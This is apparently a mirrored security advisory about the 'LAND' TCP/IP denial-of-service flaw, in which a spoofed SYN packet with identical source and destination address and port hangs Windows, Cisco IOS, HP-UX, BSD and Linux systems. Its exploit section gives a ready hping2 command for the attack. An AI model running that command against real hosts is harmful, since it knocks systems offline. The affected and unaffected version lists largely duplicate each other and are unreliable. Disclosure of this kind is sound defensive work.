Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 3.5.1
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 95
Marconi ATM Switch 7.0.1
Marconi ATM Switch 6.1.1
Linux kernel 2.0.31
Linux kernel 2.0.30
HP HP-UX (VVOS) 10.24
HP HP-UX 11.0
HP HP-UX 10.30
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.1 0
HP HP-UX 10.0 1
HP HP-UX 10.0
HP HP-UX 9.0
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
Cisco IOS/700 1.0
Cisco IOS 11.2
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
BSDI BSD/OS 2.1
BSDI BSD/OS 2.0.1
BSDI BSD/OS 2.0
BSDI BSD/OS 1.1
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- 不受影响的程序版本

NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1 .x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- 漏洞讨论

A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices &amp; Catalyst switches, and HP-UX up to 11.00.

It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.

**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.

- 漏洞利用

The following exploits are available, additionally it is reported that the hping2 utility may be used to launch an attack as follows:
hping2 192.168.1.1 -s 135 -p 135 -S -a 192.168.1.1

A new exploit (imland.c) has been provided to demonstrate the issue on Windows Server 2003 and XP SP2.

- 解决方案

Apply the appropriate patches or upgrade to an unaffected software version.

Microsoft has released an advisory and updates to address this and other issues.

Microsoft has released revised fixes to address this and other issues. Microsoft recommends installing the revised fixes even if the previous versions have been installed.


Microsoft Windows NT Enterprise Server 4.0 SP3

Microsoft Windows NT 4.0 SP3

Microsoft Windows NT Server 4.0 SP3

Microsoft Windows NT Terminal Server 4.0 SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows NT Workstation 4.0 SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows NT 4.0 SP3 alpha

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP 64-bit Edition

Microsoft Windows XP Professional SP2

Microsoft Windows XP Professional SP1

Microsoft Windows 95

HP HP-UX 10.0 1

HP HP-UX 10.0

HP HP-UX 10.10

HP HP-UX 10.16

HP HP-UX 10.20

HP HP-UX (VVOS) 10.24

HP HP-UX 10.30

HP HP-UX 11.0

FreeBSD FreeBSD 2.2.5

SCO Open Server 5.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站